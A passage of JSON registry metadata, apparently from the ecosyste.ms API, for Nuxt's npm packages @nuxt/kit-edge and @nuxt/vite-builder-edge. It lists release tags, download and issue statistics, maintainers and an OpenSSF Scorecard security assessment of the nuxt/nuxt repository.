itHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.533Z","dependent_packages_count":12,"downloads":28044,"downloads_period":"last-month","dependent_repos_count":36,"rankings":{"downloads":0.8926644018074765,"dependent_repos_count":2.1346415761264192,"dependent_packages_count":1.7801137545680426,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":1.1030955754504812,"average":1.0982518861322916},"purl":"pkg:npm/%40nuxt/kit-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/kit-edge","docker_dependents_count":10,"docker_downloads_count":294,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/kit-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/kit-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2025-08-15T18:12:06.716Z","updated_at":"2025-08-15T18:12:06.716Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-11-10T08:05:33.739Z","updated_at":"2023-11-10T08:05:33.739Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096150,"name":"@nuxt/vite-builder-edge","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.svg)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1985,"first_release_published_at":"2021-07-01T12:51:45.393Z","latest_release_published_at":"2023-03-07T21:15:32.988Z","latest_release_number":"4.0.0-27970394.60d07df4","last_synced_at":"2026-04-01T04:01:52.023Z","created_at":"2022-04-08T10:39:39.548Z","updated_at":"2026-04-01T04:01:52.023Z","registry_url":"https://www.npmjs.com/package/@nuxt/vite-builder-edge","install_command":"npm install @nuxt/vite-builder-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.0-28284309.b3d3d7f4","pr-20836":"3.6.0-28072625.2e2d8450","pr-20910":"3.5.1-28071980.657d1b01","pr-21066":"3.5.2-28084070.1bb05d83","pr-21450":"3.6.0-28124217.43844474","pr-19403":"3.6.0-28106934.bccf6dd0","pr-21461":"3.6.0-28107353.3fa5f90a","pr-21655":"3.6.0-28121506.bee3dde2","pr-21573":"3.6.0-28121201.45550c5f","pr-21705":"3.6.0-28125223.60c7ae2d","pr-21793":"3.6.3-28155682.16a8312f","pr-22224":"3.7.0-28163062.f38eafa6","pr-22227":"3.6.5-28163125.3d0d7508","pr-21747":"3.7.0-28179135.c12f0f09","pr-22362":"3.7.0-28179877.ea6d5c28","pr-21641":"3.8.0-28246590.5d47cf10","pr-22465":"3.7.0-28184377.9a30357e","pr-22494":"3.7.0-28185860.e8cb8914","pr-22515":"3.7.0-28197383.e0d6624f","pr-23526":"3.8.0-28275051.7cb8d079"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed 